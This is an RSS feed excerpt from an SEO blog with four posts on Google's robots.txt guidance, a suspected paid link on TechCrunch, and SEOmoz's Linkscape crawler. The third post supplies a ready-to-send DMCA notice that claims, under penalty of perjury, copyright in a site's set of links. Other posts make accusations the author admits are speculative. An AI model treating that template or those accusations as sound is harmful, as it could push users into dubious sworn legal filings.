		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[the prez]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=231</guid>
		<description><![CDATA[That&#8217;s right&#8230; today Matt Cutts completely reversed his opinion on pages indexed in Google that are nothing more than copies of auto-generated snippets. Back in March of 2007, Matt discussed search results within search results, and Google&#8217;s dislike for them: In general, we&#8217;ve seen that users usually don&#8217;t want to see search results (or copies [...]]]></description>
			<content:encoded><![CDATA[<p>That&#8217;s right&#8230; today Matt Cutts completely reversed his opinion on pages indexed in Google that are nothing more than copies of auto-generated snippets. </p>
<p>Back in March of 2007, Matt discussed <a href="http://www.mattcutts.com/blog/search-results-in-search-results/" target="_blank">search results within search results</a>, and Google&#8217;s dislike for them:</p>
<blockquote><p>In general, we&#8217;ve seen that users usually don&#8217;t want to see search results (or copies of websites via proxies) in their search results. Proxied copies of websites and search results that don&#8217;t add much value already fall under our quality guidelines (e.g. &#8220;Don&#8217;t create multiple pages, subdomains, or domains with substantially duplicate content.&#8221; and &#8220;Avoid &#8220;doorway&#8221; pages created just for search engines, or other &#8220;cookie cutter&#8221; approaches&#8230;&#8221;), so Google does take action to reduce the impact of those pages in our index.</p>
<p>But just to close the loop on the original question on that thread and clarify that Google reserves the right to reduce the impact of search results and proxied copies of web sites on users, Vanessa also had someone add a line to the quality guidelines page. The new webmaster guideline that you&#8217;ll see on that page says &#8220;Use robots.txt to prevent crawling of search results pages or other auto-generated pages that don&#8217;t add much value for users coming from search engines.&#8221; &#8211; <em>Matt Cutts</em></p></blockquote>
<p>Now, while the <a href="http://www.google.com/support/webmasters/bin/answer.py?hl=en&#038;answer=35769" target="_blank">Google Webmaster Guidelines</a> still specifically instruct webmasters to <span id="more-231"></span>block these pages, Matt himself appears to have changed his mind on the issue. Today on Twitter, <a href="http://twitter.com/mattcutts/status/1136707361" target="_blank">Matt said this</a>:</p>
<p><img src="/images/matt-likes-more-crawling.png" alt="Give me your tired, your poor, your masses of auto-generated pages! - Matt Cutts" onmouseup="hl2l(event);"></p>
<p>The <a href="http://www.kottke.org/09/01/the-countrys-new-robotstxt-file" target="_blank">link that Matt provided</a> was to a story discussing the differences between the robots.txt file for the whitehouse.gov website under the Bush regime (<a href="/images/whitehouse-bush-robots-txt.txt" target="_blank">cached copy</a>), versus the brand spanking new one that went up as soon as Obama took office. Matt apparently likes it because it means that as far as Google goes, there is &#8220;much more crawling allowed&#8221; with the <a href="http://www.whitehouse.gov/robots.txt" target="_blank">new file</a>:</p>
<p><img src="/images/whitehouse-obama-robots-txt.png" alt="Much more crawling allowed - Matt Cutts" onmouseup="hl2l(event);"></p>
<p>He&#8217;s right, of course. The new version only restricts one directory (for now, anyways), the /includes/ one, whereas the old version contained 2,305 path restrictions that pertained to Google (and every other bot, for that matter). Let&#8217;s take a look, however, at exactly what the old version was blocking from being indexed:</p>
<p><img src="/images/whitehouse-bush-robots-txt.png" alt="Much less crawling allowed" onmouseup="hl2l(event);"></p>
<p>The first line is for /cgi-bin, which it is quite normal to block. The next 11 lines blocked are all search type pages. Now, even though the Google Webmaster Guidelines very clearly state that those pages should be blocked, since Matt is saying that &#8220;more crawling allowed == Matt likes&#8221; I would strongly suggest that people <em>not</em> block them in their own robots.txt*. For real. Cause as we all know, Matt > Google Webmaster Guidelines. Seriously.</p>
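<p>If you want to check for yourself what a given robots.txt does and doesn&#8217;t let a bot fetch, here is a minimal sketch using the parser in Python&#8217;s standard library. The two rule sets are hypothetical stand-ins that I wrote for illustration, not copies of the real whitehouse.gov files, and <code>build_parser</code> is just a helper name I made up.</p>

```python
from urllib.robotparser import RobotFileParser


def build_parser(robots_txt):
    """Parse robots.txt text from a string instead of fetching it over HTTP."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


# Hypothetical stand-ins: the paths below are illustrative, not the real files.
old_style = build_parser("User-agent: *\nDisallow: /cgi-bin\nDisallow: /search\n")
new_style = build_parser("User-agent: *\nDisallow: /includes/\n")

search_page = "http://www.whitehouse.gov/search/?keywords=economy"

print(old_style.can_fetch("Googlebot", search_page))  # False
print(new_style.can_fetch("Googlebot", search_page))  # True
```

<p>Under the old-style rules the search page is off limits, and under the new-style rules it is fair game.</p>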
<p>Some of you may be wondering about the other 2,293 restrictions in the old file. If you look at the restrictions starting at the 13th path listed, and on through the rest of them that Google is supposed to obey, every path ends with /text. Those were the printer friendly versions of other pages, and indexing them would result in duplicate content getting indexed in Google. Last year in February, Matt had this to say about <a href="http://www.mattcutts.com/blog/duplicate-content-question/" target="_blank">blocking duplicate content</a>:</p>
<blockquote><p>I often get questions from whitehat sites who are worried that they might receive duplicate content penalties because they have the same article in different formats ( e.g. a paginated version and a printer-ready version). While <strong>it&#8217;s helpful to try to pick one of those articles and exclude the other version from indexing</strong>, typically.. &#8211; <em>Matt Cutts</em></p></blockquote>
<p>That, however, was last year. As Matt clearly indicates in his tweet today, regardless of what the content actually is, how it was generated, or how many copies of it exist, he would <em>much</em> prefer less restrictive robots.txt files in the future.</p>
<p>Thanks for clarifying, Matt. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p><strong>UPDATE:</strong> Ok, I just got alerted to the fact that these new and improved Whitehouse.gov &#8220;allowed pages&#8221; are already <a href="http://www.google.com/search?num=100&#038;hl=en&#038;safe=off&#038;q=site%3Awhitehouse.gov%2Fsearch%2F%3Fkeywords%3D&#038;btnG=Search" target="_blank">making it into the serps</a>:</p>
<p><img src="/images/whitehouse-search-in-search.png" alt="Much more crawling results in Google" onmouseup="hl2l(event);"></p>
<p>Thank you <a href="http://twitter.com/johnweb" target="_blank">John Honeck</a> for the heads up.</p>
<div><em><strong>*Disclaimer:</strong> Kidding, btw, for those who can&#8217;t detect sarcasm. <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  </em></div>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2009/01/21/serps-scrapers-rejoice-matt-cutts-endorses-indexing-of-search-results-in-google/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Matt Cutts, If This Paid Link Were A Snake It Would Have Bitten You In The Ass</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 12:53:48 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[Cuttisms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=179</guid>
		<description><![CDATA[Wednesday TechCrunch posted an article about a new ad product launched by MediaWhiz. The name of the product is InLinks, and it involves people being able to purchase anchor rich text links embedded into content in a way that is supposed to give it a &#8220;natural&#8221; feel. Michael Arrington called the product &#8220;insidious&#8221;. His whole [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/pagerank-for-sale.png" border="0" alt="PageRank for sale." style="float: right;"  onmouseup="hl2l(event);"> Wednesday  <a href="http://www.techcrunch.com/2008/11/19/insidious-new-seo-ad-product-will-be-hard-for-google-to-detect/" target="_blank">TechCrunch posted an article</a> about a new ad product launched by MediaWhiz. The name of the product is InLinks, and it involves people being able to purchase anchor rich text links embedded into content in a way that is supposed to give it a &#8220;natural&#8221; feel. Michael Arrington called the product &#8220;insidious&#8221;. His whole take on it was that these new paid links would &#8220;be hard for Google to detect&#8221;. Quite a <a href="http://www.shoemoney.com/2008/11/19/does-google-really-want-to-go-down-this-ftc-route/" target="_blank">bit of</a> <a href="http://www.seobook.com/in-links-launches" target="_blank">discussion</a> <a href="http://www.blogstorm.co.uk/how-google-can-detect-inlinks/1554/" target="_blank">followed</a>, sparked in large part by the fact that Matt Cutts chimed in on the matter. What no one seemed to notice, however,<span id="more-179"></span> is that Matt, who most would naturally think of as an expert in detecting paid links, apparently missed one when it was staring him right in the face&#8230; the link that MediaWhiz bought from TechCrunch.</p>
<p>Check the source on the post by Arrington, and sure enough, you will find a nice, clean, non-nofollowed link back to MediaWhiz. I have to give them credit too&#8230; it was slick the way they covered their tracks on this one. First, they either purchased some links on a couple of lesser known blogs, namely <a href="http://www.deepjiveinterests.com/2008/11/19/text-link-ads-debuts-inlinkscom-hopes-to-fly-under-googles-radar/" target="_blank">Deep Jive Interests</a> and <a href="http://www.labnol.org/internet/inlinks-new-text-links-ads-tough-to-detect/5476/" target="_blank">Digital Inspiration</a>, or they simply waited for someone to just blog about their new product without being asked. This made it at least <em>somewhat</em> plausible that Michael Arrington just happened to stumble across the release of their new product all on his own. Of course, it also helps that the link sale wasn&#8217;t discussed openly on a forum, and that Arrington doesn&#8217;t publicly list the cost of a content link on TechCrunch anywhere. No, a link sale like this would have been privately negotiated, behind closed doors and away from prying eyes (and out of the sight of potential Google snitches).</p>
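<p>For those who would rather not read page source by eye, here is a rough Python sketch of the same check: it lists every link in a chunk of HTML that lacks <code>rel="nofollow"</code>. The sample markup and the class name are hypothetical, written only for this illustration, and none of it comes from the TechCrunch post.</p>

```python
from html.parser import HTMLParser


class FollowedLinkFinder(HTMLParser):
    """Collect href values of anchors that lack rel="nofollow"."""

    def __init__(self):
        super().__init__()
        self.followed = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        attributes = dict(attrs)
        # rel may hold several space-separated tokens, or be missing entirely.
        rel_tokens = (attributes.get("rel") or "").lower().split()
        if "href" in attributes and "nofollow" not in rel_tokens:
            self.followed.append(attributes["href"])


# Hypothetical markup standing in for a post's source.
sample = (
    '<p>See <a href="http://example.com/product">the product</a> and '
    '<a rel="nofollow" href="http://example.org/ad">this ad</a>.</p>'
)

finder = FollowedLinkFinder()
finder.feed(sample)
print(finder.followed)  # ['http://example.com/product']
```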
<p>How much would a link like this cost? Probably not cheap. It&#8217;s not just the raw link juice that has to be factored into the price, either&#8230; it&#8217;s also the fact that blogs like TechCrunch are so completely above suspicion. It might not have been an all cash transaction, either&#8230; there could have been an expensive meal involved in the negotiations, or perhaps even some barter tossed in. </p>
<p>Do I know for a fact that MediaWhiz purchased that link from TechCrunch? Nope. Then again, neither does Google. </p>
<p>Now, I am sure that many people will be buying floods of new content links from this new service, and of course Google, seeing as they have historical link graphs to compare to, will probably easily spot link growth spikes of a certain level. However, there is no way that they will be able to detect content links like this new service is offering that are obtained stealthily. That doesn&#8217;t mean they won&#8217;t try. Their attempts to do so will no doubt cause much collateral damage to the rankings (and therefore traffic, and revenue) of many legitimate, quality sites out there. Google, however, doesn&#8217;t really care about that. You see, it&#8217;s not always about quality for Google. Often times, it&#8217;s about appearances.</p>
<p>Somewhere along the line, someone stated that they had PageRank for sale, that for a certain price you could buy higher rankings. One of the higher ups at Google caught wind of this, and thought, &#8220;Oh, no, we can&#8217;t have that&#8230; Google is supposed to be ungameable! This will make us <em>look</em> bad!&#8221; Right then and there, the war against paid links was launched&#8230; and it&#8217;s really not a battle that Google can win. Google cannot stop value passing links from being a commodity. What Google <em>can</em> do is drive up the price of links like this, the ones that truly will pass being manually reviewed. Sure, Google can do a ton of damage to the rankings of a lot of sites, and they might even hit an actual paid link here and there&#8230; but that won&#8217;t help with relevancy. If this really was a battle that was concerned with quality instead of image, then they wouldn&#8217;t care about links that were purchased to <em>quality</em> sites. The whole argument about editorial discretion would then actually mean something.</p>
<p>You know, here&#8217;s a thought. If Google quit worrying about whether or not a link was paid, and simply worked more on penalizing for linking out to <em>crappy</em> sites, then eventually people would stop linking out <em>just</em> for money, out of self-preservation. The issue of whether or not paid links lowered the quality of the serps would simply go away. It&#8217;s a much more elegant solution, don&#8217;t you think?</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/11/21/matt-cutts-if-this-paid-link-were-a-snake-it-would-have-bitten-you-in-the-ass/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How To Remove Your Website From Linkscape *Without* An SEOmoz Meta Tag</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/#comments</comments>
		<pubDate>Tue, 21 Oct 2008 07:55:50 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>
		<category><![CDATA[web design]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=156</guid>
		<description><![CDATA[Over the past couple of weeks, one of the biggest concerns about SEOmoz&#8217;s new Linkscape tool (which I recently blogged about in reference to the bots that Rand refuses to identify, and then again due to suspicious additions of a phantom 7 billion pages to one of his index sources) has been the complete lack [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/gavel.jpg" border="0" alt="You do have rights to your content." style="float: right;"  onmouseup="hl2l(event);"> Over the past couple of weeks, one of the biggest concerns about SEOmoz&#8217;s new Linkscape tool (which I recently blogged about in reference to the <a href="/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/" target="_blank">bots that Rand refuses to identify</a>, and then again due to <a href="/2008/10/20/how-to-add-7-billion-pages-to-your-index-overnight" target="_blank">suspicious additions of a phantom 7 billion pages</a> to one of his index sources) has been the complete lack of a method available for someone to remove their data from the tool. Assuming that all of the hints Rand has been so &#8220;subtly&#8221; dropping are accurate, and the one bot that they do actually have control over is in fact <a href="http://www.dotnetdotcom.org/" target="_blank">DotBot</a>, then from the beginning the data was collected under false pretenses. The DotBot website clearly states<span id="more-156"></span> the following as its purpose:</p>
<blockquote><p>Our purpose is rather simple. We want to make the internet as open as possible. Currently only a select few corporations have a complete and useful index of the web. Our goal is to change that fact by crawling the web and releasing as much information about its structure and content as possible. We plan on doing this in a manner that will cover our costs (selling our index) and releasing it for free for the benefit of all webmasters.</p></blockquote>
<p>If, again, DotBot is owned by SEOmoz, then the actual goal of collecting those webpages was the development of a commercial tool. With that in mind, Rand&#8217;s refusal to remove pages from the index that the owners do not want in there takes on a whole new level of unreasonableness. When <a href="http://sphinn.com/story/80142#c56146" target="_blank">pressed about it</a>, this is the most Rand is willing to compromise as far as removing sites from the index:</p>
<blockquote><p>3)SEOmoz will ONLY remove your site from DISPLAYING your data through Linkscape if you add a customized SEOmoz meta tag to each and every page on your site, and even then, only after a 30-60 day time period.</p>
<p>Yes, although we are looking at ways to block an entire site from being shown in the future through a registration system. And yes, we can&#8217;t block anything until we&#8217;ve re-crawled and re-indexed that page, which can take 30-60 days depending on the speed with which we crawl/re-crawl a given URL.</p>
<p>4)SEOmoz is &#8220;unwilling to provide a clear concise way to keep data out of Linkscape.&#8221;</p>
<p>That&#8217;s what you said, and I merely copied it to point out that it had an exception. I know it&#8217;s a fun soundbyte, but without the important caveat in the sentence it was in, it&#8217;s really unfair to keep using this phrase. That caveat is that we are willing to provide one clear, concise way to keep data out of Linkscape &#8211; the seomoz noindex meta tag.</p></blockquote>
<p>So, the only way Rand will <em>voluntarily</em> remove your site from his index is if you agree to basically brand your website with a meta tag using his company name, and then wait 30-60 days. Unfortunately for him, that&#8217;s really not his call.</p>
<p>You own your website and the data it contains (assuming you did not scrape it from somewhere else, of course), and that ownership is protected under US copyright law. Anyone whose rights are violated under that law has specific remedies available to them under the <a href="http://en.wikipedia.org/wiki/Digital_Millennium_Copyright_Act" target="_blank">Digital Millennium Copyright Act</a>.</p>
<p><strong>Now, I cannot stress this strongly enough&#8230;</strong> these remedies are <em>not</em> intended to harass a website owner. They should be used neither frivolously nor fraudulently, and <em>there are penalties for filing false information</em>. You should under no circumstances perform this process for any urls or domains that you do not explicitly own, and if a counter-notification does get filed then you should in fact follow through with a lawsuit.</p>
<p>For all <em>valid</em> claims, I am outlining an easy to follow process for requesting that your information be removed from his index.</p>
<p>First, verify that your content is indeed in their tool. If it is, then the next step is to contact SEOmoz directly. Give them a chance to rectify the situation in a timely manner. Send a polite request that your entire domain be completely removed from the index powering their Linkscape tool, and ask for a way to confirm that it has indeed been done. The support email for SEOmoz is listed on the site as <a href="mailto:sitesupport@seomoz.org">sitesupport@seomoz.org</a>, or you can fax them the request at (206) 338-3797. In this request you should list who you are, the address of your domain, and your contact information. Despite Rand&#8217;s insistence that they cannot do this, it might turn out that they do in fact have the ability after all. Do not skip the step of contacting them first. For tracking purposes, you might want to CC their ISP with this initial request, to document that you did indeed attempt to resolve the issue with them first, although this is not required. If you do decide to do that, SEOmoz&#8217;s ISP is <a href="http://www.hopone.net/" target="_blank">HopOne Internet Corporation</a>. The appropriate email to use for these matters, according to <a href="http://www.hopone.net/aup.php" target="_blank">HopOne&#8217;s AUP</a>, is <a href="mailto:abuse@hopone.net">abuse@hopone.net</a>, and their fax is (604) 608-2953.</p>
<p>If after a reasonable amount of time, say, 24 hours, they still have not removed your site&#8217;s information, then you can consider sending a formal DMCA letter to their ISP, HopOne. The requirements for such a letter are very specific, and are laid out in <a href="http://www4.law.cornell.edu/uscode/17/512.html#c_3" target="_blank">17 U.S.C. § 512(c)(3)</a>, &#8220;Elements of notification&#8221;. A sample DMCA notice for this purpose might look something like this:</p>
<blockquote><p>To: abuse@hopone.net<br />
Subject: Notice of Copyright Infringement<br />
The copyrighted work at issue is the entire set of links appearing on my domain at {<strong>www.mydomain.com</strong>}, each comprised of their respective URLs, anchor texts, and attributes, including both those constituting my website&#8217;s navigation, as well as those linking my website to other websites on the Internet. While I acknowledge that an individual url in and of itself may not be copyrightable, I maintain that the set of links residing on my website, taken as a whole or in sections, does in fact comprise a structure that is unique and my own property.</p>
<p>The freely accessible URL where my copyrighted material is located is accessed through the gateway page located at http://www.seomoz.org/linkscape . Since the interface that is displaying my content is only visible via an http POST request, it is necessary to enter my domain {<strong>www.mydomain.com</strong>} into the text box presented, and then press the button labeled &#8220;GO&#8221;, in order to view the infringing material. Note that while this does demonstrate the existence of the infringing material being used on the server, it is only the one open to the general public without paying a fee, although this request is for the removal of the information from the index completely, including from areas accessible only to paying members of the website.</p>
<p>The contact information for the company of the infringing website, as indicated by their Contact Us page, is as follows:<br />
Office: (206) 632-3171<br />
Fax: (206) 338-3797<br />
sitesupport@seomoz.org<br />
SEOmoz.org<br />
1221 E. Pike St., Suite 200<br />
Seattle, WA 98122</p>
<p>I can be reached at {<strong>your@email.com</strong>}, or via telephone at {<strong>your telephone number</strong>}. My mailing address is {<strong>your full mailing address, including street and number, any apartment number, city, state, and zip code</strong>}.</p>
<p>I have a good faith belief that use of the copyrighted materials described above as allegedly infringing is not authorized by the copyright owner, its agent, or the law.</p>
<p>I swear, under penalty of perjury, that the information in the notification is accurate and that I am the copyright owner or am authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.</p>
<p>At your earliest convenience, please respond to this letter at my email address listed above, and let me know what actions have been taken to resolve this matter. Thank you.</p>
<p>My electronic signature is below:<br />
{<strong>Put Your Name Here</strong>}</p></blockquote>
<p>Bottom line is, it would be nice if Rand would simply step up to the plate and actually <em>be</em> the nice guy he wants everyone to believe that he is. Until such time as that actually happens, however, as sad as it may be, this may be our only recourse to keep him from using our information without consent.</p>
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/10/21/how-to-remove-your-website-from-linkscape-without-an-seomoz-meta-tag/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>How To Block The Bots SEOmoz *Isn&#8217;t* Telling You About</title>
		<link>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/</link>
		<comments>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/#comments</comments>
		<pubDate>Fri, 17 Oct 2008 18:05:54 +0000</pubDate>
		<dc:creator>Michael VanDeMar</dc:creator>
				<category><![CDATA[blogthropology]]></category>
		<category><![CDATA[coding]]></category>
		<category><![CDATA[lackofmeds]]></category>
		<category><![CDATA[nerdiness]]></category>
		<category><![CDATA[On The Ball-ness]]></category>
		<category><![CDATA[psychoblogging]]></category>
		<category><![CDATA[scams]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Social Media]]></category>

		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=132</guid>
		<description><![CDATA[Ok, so, looks like Rand and gang finally decided to reveal their top-secret recipe about how they gathered all that information on everybody&#8217;s websites without anyone noticing what they were doing. There was quite a bit of hoopla when they announced their new index of 30 billion web pages (and the [...]]]></description>
			<content:encoded><![CDATA[<p><img src="/images/oath_witness.png" border="0" alt="I swear to tell the... wait, what did you say..?" style="float: right;"  onmouseup="hl2l(event);"> Ok, so, looks like Rand and gang finally decided to reveal their top-secret recipe about how they gathered all that information on everybody&#8217;s websites without anyone noticing what they were doing. There was <a href="http://ekstreme.com/thingsofsorts/fun-web/the-seomoz-linkscape-ghost" target="_blank">quite a bit of hoopla</a> <a href="http://www.seomoz.org/blog/announcing-seomozs-index-of-the-web-and-the-launch-of-our-linkscape-tool" target="_blank">when they announced their new index of 30 billion web pages</a> (and the new tool powered by that index), due to the fact that they never gave webmasters the chance to block them from gathering this data. In fact, they never even<span id="more-132"></span> announced their presence at all.</p>
<p>While this is a huge breach of netiquette as it pertains to crawlers, at least today <a href="http://sphinn.com/story/77000#c55704" target="_blank">Rand finally announced</a> that they are now disclosing their sources for data. In fact, this was how he worded it to the community:</p>
<blockquote><p>we are now disclosing our sources for data &#8211; <em>Rand Fishkin, SEOmoz CEO and really, really open guy</em></p></blockquote>
<p>Better late than never, right?</p>
<p>The thing is, as I was looking over the list of bots that you would need to block in order to prevent mozzers from gathering your data, I noticed this subtle, easy to miss pattern in what they were listing. You have to look really, really close to see it, and the untrained eye might never see it at all, but luckily, eventually, I did see it for myself:</p>
<p><img src="/images/moz-crawlers2.png" alt="other data sources and additional crawls...?" onmouseup="hl2l(event);"></p>
<p>That&#8217;s right folks, if you <em>do</em> decide to keep moz out by blocking all of the big guys (Google, Yahoo, MSN, Ask, Amazon, and Alexa), the lesser known guys (Dotnetdotcom, Grub, Page-Store, and Exalead), and that one <em>fictional</em> guy they threw in there (Gagablast), you still won&#8217;t have them blocked. Fear not though&#8230; after much work, I finally figured out that Rand was indeed true to his word, and that they did in fact release enough information to block the bots. All you have to do is add the following lines to your robots.txt, and you&#8217;ll be golden*:</p>
<pre>
<code>User-Agent: *and other data sources
Disallow: /
User-Agent: Additional crawls*
Disallow: /</code>
</pre>
<p>See? I got ya covered! <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>Seriously though, despite the fact that Rand and Co. are still less than forthcoming about all of the bots that are used (I&#8217;m guessing he doesn&#8217;t actually know, to be honest), something much more revealing is highlighted in this information, namely, <em>they lied about having their own crawler</em>.</p>
<p>Let&#8217;s take a quick review of some statements Rand made in the initial announcement about the tool:</p>
<ul>
<li>Our crawl biases towards having pages and data&#8230;</li>
<li>As others who&#8217;ve invested energy into crawling the web&#8230;</li>
<li>our crawl biases towards this &#8220;center&#8221;&#8230;</li>
<li>Our process for crawling the web&#8230;</li>
<li>Moving forward, we&#8217;ll&#8230; invest in better and faster crawling&#8230;</li>
<li>In comparing our crawls against the engines&#8230;</li>
<li>we&#8217;ll be releasing more information about our crawl&#8230;</li>
</ul>
<p>You also have statements made by moz employee Nick Gerner like this:</p>
<ul>
<li>we&#8217;re crawling everything we can&#8230;</li>
</ul>
<p>You even have him claiming bullshit like this:</p>
<blockquote><p>We do prioritize the crawl according to pages we think are important. For now, and probably for the foreseeable future we&#8217;re going to rely on link endorsement to make that decision. Make good content, get good links. Keep it publicly available. We&#8217;ll get there soon enough &#8211; <em>Nick Gerner, moz employee</em></p></blockquote>
<p>That&#8217;s right, not only did they claim that they were crawling the web, they wanted us to believe  that they prioritized how they crawled based on an <em>importance</em> algorithm! <img src='http://smackdown.blogsblogsblogs.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<p>I have to admit, Rand, it&#8217;s pretty bold to basically admit this late in the game that you guys lied through your teeth and grossly misrepresented the facts, just so you could appear to have accomplished a much bigger task than you actually did, all in the name of getting more money from webmasters. That&#8217;s a much bigger admission than saying you cloaked your bot, if you ask me. Gratz on coming clean.</p>
<div><em><strong>*Disclaimer:</strong> The code I listed is sarcasm, btw. Those robots.txt lines won&#8217;t actually block anything, just in case you didn&#8217;t know.</em></div>
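<p>For the curious, here is a minimal Python sketch of why those lines do nothing, next to a rule that names a bot outright. It shows how the parser in Python&#8217;s standard library reads the rules, and real crawlers may differ in the details. The <code>dotbot</code> token is my assumption about how that crawler identifies itself, and <code>blocks</code> is a helper name I made up.</p>

```python
from urllib.robotparser import RobotFileParser


def blocks(robots_txt, user_agent, url="http://www.example.com/page.html"):
    """Return True if robots_txt tells user_agent to stay away from url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, url)


# The sarcastic rules: neither User-Agent value matches any real bot name.
joke_rules = (
    "User-Agent: *and other data sources\n"
    "Disallow: /\n"
    "User-Agent: Additional crawls*\n"
    "Disallow: /\n"
)
# "dotbot" is assumed here to be the token that crawler identifies itself with.
real_rules = "User-agent: dotbot\nDisallow: /\n"

print(blocks(joke_rules, "dotbot"))     # False
print(blocks(real_rules, "dotbot"))     # True
print(blocks(real_rules, "Googlebot"))  # False
```

<p>A rule only helps when its User-agent line matches a name the bot actually announces, which is exactly why an undisclosed bot cannot be blocked this way.</p>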
]]></content:encoded>
			<wfw:commentRss>http://smackdown.blogsblogsblogs.com/2008/10/17/how-to-block-the-bots-seomoz-isnt-telling-you-about/feed/</wfw:commentRss>
		<slash:comments>78</slash:comments>
		</item>
	</channel>
</rss>

